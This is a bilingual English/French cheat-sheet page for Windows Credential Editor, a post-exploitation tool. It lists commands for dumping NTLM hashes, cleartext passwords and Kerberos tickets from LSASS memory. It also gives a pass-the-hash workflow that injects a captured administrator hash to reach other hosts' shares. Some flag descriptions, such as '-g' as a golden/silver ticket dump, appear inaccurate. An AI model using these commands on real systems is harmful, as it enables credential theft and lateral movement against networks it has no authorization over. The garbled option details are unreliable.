Windows Credential Editor (WCE)
Liste les sessions de connexion et dump ou modifie les identifiants NTLM, les tickets Kerberos et les mots de passe en clair mis en cache en mémoire par LSASS. Lists logon sessions and dumps or changes NTLM credentials, Kerberos tickets, and cleartext passwords cached in memory by LSASS.
↗ https://www.ampliasecurity.com/research/windows-credentials-editor/Overview
Windows Credential Editor (WCE) is a post-exploitation credential-harvesting tool that reads NTLM hashes, Kerberos tickets, and (on older/unpatched systems) cleartext passwords directly out of LSASS memory. It predates Mimikatz and pioneered a lot of the same in-memory credential extraction and pass-the-hash techniques, still occasionally seen in the wild or referenced in engagements against legacy Windows infrastructure.
Common Usage
# List all logon sessions and their NTLM hashes
wce -l
# Dump cleartext passwords cached by WDigest (older Windows, WDigest enabled)
wce -w
# Change the NTLM credentials of a logon session (pass-the-hash setup)
wce -s <username>:<domain>:<LM_hash>:<NT_hash>
# Save current logon session credentials to a file
wce -o creds.txt
# Dump Kerberos tickets from memory
wce -k tickets.kirbi
# Generate a Kerberos golden/silver ticket-style dump for reuse
wce -g tickets.dat
Pass-the-Hash Workflow
# 1. Dump hashes from a compromised host
wce -l
# 2. Inject a captured NTLM hash into the current logon session
wce -s administrator:DOMAIN:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
# 3. Use the now-impersonated session to access SMB/RDP on other hosts
net use \\<target>\C$
Tips
- Requires local admin/SYSTEM privileges to read LSASS memory.
- Cleartext password dumping (
-w) only works if WDigest is enabled, which is disabled by default since Windows 8.1/Server 2012 R2 (KB2871997) — largely a legacy-system technique now. - Modern engagements typically favor Mimikatz for the same class of attack; WCE is still relevant on older/unpatched Windows targets and for understanding pass-the-hash fundamentals.
- Heavily signatured by AV/EDR — expect detection on any modern defended endpoint.
Help / Man page
wce [options]
-l List logon sessions and NTLM credentials (default)
-w Dump cleartext passwords (requires WDigest enabled)
-s user:domain:lm:nt Change NTLM credentials of current session
-o file Save output to file
-k file Dump Kerberos tickets to file
-g file Generate ticket dump for reuse
-c cmd Run cmd with changed credentials (used with -s)
-d Delete current logon session's cached credentials
-v Verbose output
Vue d’ensemble
Windows Credential Editor (WCE) est un outil de récolte d’identifiants post-exploitation qui lit les hashes NTLM, les tickets Kerberos et (sur les systèmes anciens/non patchés) les mots de passe en clair directement depuis la mémoire de LSASS. Il précède Mimikatz et a été pionnier sur nombre des mêmes techniques d’extraction d’identifiants en mémoire et de pass-the-hash, encore occasionnellement observé sur le terrain ou référencé lors de missions contre des infrastructures Windows héritées.
Utilisation courante
# Lister toutes les sessions de connexion et leurs hashes NTLM
wce -l
# Dumper les mots de passe en clair mis en cache par WDigest (Windows ancien, WDigest activé)
wce -w
# Changer les identifiants NTLM d'une session de connexion (préparation pass-the-hash)
wce -s <username>:<domain>:<LM_hash>:<NT_hash>
# Sauvegarder les identifiants de la session de connexion actuelle dans un fichier
wce -o creds.txt
# Dumper les tickets Kerberos depuis la mémoire
wce -k tickets.kirbi
# Générer un dump de type ticket Kerberos golden/silver pour réutilisation
wce -g tickets.dat
Flux de travail Pass-the-Hash
# 1. Dumper les hashes depuis un hôte compromis
wce -l
# 2. Injecter un hash NTLM capturé dans la session de connexion actuelle
wce -s administrator:DOMAIN:00000000000000000000000000000000:8846f7eaee8fb117ad06bdd830b7586c
# 3. Utiliser la session désormais usurpée pour accéder à SMB/RDP sur d'autres hôtes
net use \\<target>\C$
Conseils
- Nécessite des privilèges administrateur local/SYSTEM pour lire la mémoire de LSASS.
- Le dump de mots de passe en clair (
-w) ne fonctionne que si WDigest est activé, ce qui est désactivé par défaut depuis Windows 8.1/Server 2012 R2 (KB2871997) : une technique désormais principalement réservée aux systèmes hérités. - Les missions modernes privilégient généralement Mimikatz pour cette même classe d’attaque ; WCE reste pertinent sur les cibles Windows anciennes/non patchées et pour comprendre les fondamentaux du pass-the-hash.
- Fortement signaturé par les AV/EDR : attendez-vous à une détection sur tout endpoint moderne défendu.
Aide / Page de manuel
wce [options]
-l List logon sessions and NTLM credentials (default)
-w Dump cleartext passwords (requires WDigest enabled)
-s user:domain:lm:nt Change NTLM credentials of current session
-o file Save output to file
-k file Dump Kerberos tickets to file
-g file Generate ticket dump for reuse
-c cmd Run cmd with changed credentials (used with -s)
-d Delete current logon session's cached credentials
-v Verbose output